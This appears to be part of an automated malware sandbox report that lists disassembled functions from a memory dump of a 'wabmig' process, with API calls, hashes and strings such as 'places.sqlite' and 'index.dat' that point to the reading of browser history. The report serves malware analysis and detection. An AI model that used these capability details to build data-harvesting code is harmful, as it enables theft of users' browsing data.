                                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                            • String ID: history.dat$places.sqlite
                                                                            • API String ID: 2641622041-467022611
                                                                            • Opcode ID: 7e5fa77ffbd80df454c8f06c208cb8abd3a99e536342b00205f9bee392087e79
                                                                            • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                            • Opcode Fuzzy Hash: 7e5fa77ffbd80df454c8f06c208cb8abd3a99e536342b00205f9bee392087e79
                                                                            • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                            Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                            • GetLastError.KERNEL32 ref: 00417627
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$File$PointerRead
                                                                            • String ID:
                                                                            • API String ID: 839530781-0
                                                                            • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                            • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                            • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                            • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                            Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: FileFindFirst
                                                                            • String ID: *.*$index.dat
                                                                            • API String ID: 1974802433-2863569691
                                                                            • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                            • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                            • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                            • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                            Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                            • GetLastError.KERNEL32 ref: 004175A2
                                                                            • GetLastError.KERNEL32 ref: 004175A8
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$FilePointer
                                                                            • String ID:
                                                                            • API String ID: 1156039329-0
                                                                            • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                            • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                            • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                            • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                            Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                            • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                            • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: File$CloseCreateHandleTime
                                                                            • String ID:
                                                                            • API String ID: 3397143404-0
                                                                            • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                            • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                            • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                            • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                            Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                            • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Temp$DirectoryFileNamePathWindows
                                                                            • String ID:
                                                                            • API String ID: 1125800050-0
                                                                            • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                            • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                            • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                            • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                            Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                            • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandleSleep
                                                                            • String ID: }A
                                                                            • API String ID: 252777609-2138825249
                                                                            • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                            • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                            • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                            • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                            Function 004099F4 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • malloc.MSVCRT ref: 00409A10
                                                                            • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                            • free.MSVCRT ref: 00409A31
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: freemallocmemcpy
                                                                            • String ID:
                                                                            • API String ID: 3056473165-0
                                                                            • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                            • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                            • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                            • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                            Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: d
                                                                            • API String ID: 0-2564639436
                                                                            • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                            • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                            • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                            • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                            Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset
                                                                            • String ID: BINARY
                                                                            • API String ID: 2221118986-907554435
                                                                            • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                            • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                            • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                            • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                            Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmp
                                                                            • String ID: /stext
                                                                            • API String ID: 2081463915-3817206916
                                                                            • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                            • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                            • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                            • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                            Function 00406B90 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmp
                                                                            • String ID: .Mw
                                                                            • API String ID: 2081463915-2453323595
                                                                            • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                            • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                            • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                            • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                            Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                            • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                              • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                              • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                            • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                              • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                            • String ID:
                                                                            • API String ID: 2445788494-0
                                                                            • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                            • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                            • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                            • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                            Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                            • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                            • String ID:
                                                                            • API String ID: 3150196962-0
                                                                            • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                            • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                            • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                            • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                            Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: malloc
                                                                            • String ID: failed to allocate %u bytes of memory
                                                                            • API String ID: 2803490479-1168259600
                                                                            • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                            • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                            • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                            • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                            Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0041BDDF
                                                                            • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcmpmemset
                                                                            • String ID:
                                                                            • API String ID: 1065087418-0
                                                                            • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                            • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                            • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                            • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                            Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                              • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                            • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                              • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                              • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                              • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                              • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                            • String ID:
                                                                            • API String ID: 1381354015-0
                                                                            • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                            • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                            • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                            • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                            Function 00418C63 Relevance: 2.6, APIs: 2, Instructions: 132COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset
                                                                            • String ID:
                                                                            • API String ID: 2221118986-0
                                                                            • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                            • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                            • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                            • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                            Function 004300E8 Relevance: 2.6, APIs: 2, Instructions: 103COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004301AD
                                                                            • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpymemset
                                                                            • String ID:
                                                                            • API String ID: 1297977491-0
                                                                            • Opcode ID: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                            • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                            • Opcode Fuzzy Hash: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                            • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                            Function 0040B1AB Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: free
                                                                            • String ID:
                                                                            • API String ID: 1294909896-0
                                                                            • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                            • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                            • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                            • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                            Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                              • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                              • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                              • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                            • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: File$Time$CloseCompareCreateHandlememset
                                                                            • String ID:
                                                                            • API String ID: 2154303073-0
                                                                            • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                            • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                            • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                            • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                            Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                            • String ID:
                                                                            • API String ID: 3150196962-0
                                                                            • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                            • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                            • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                            • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                            Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
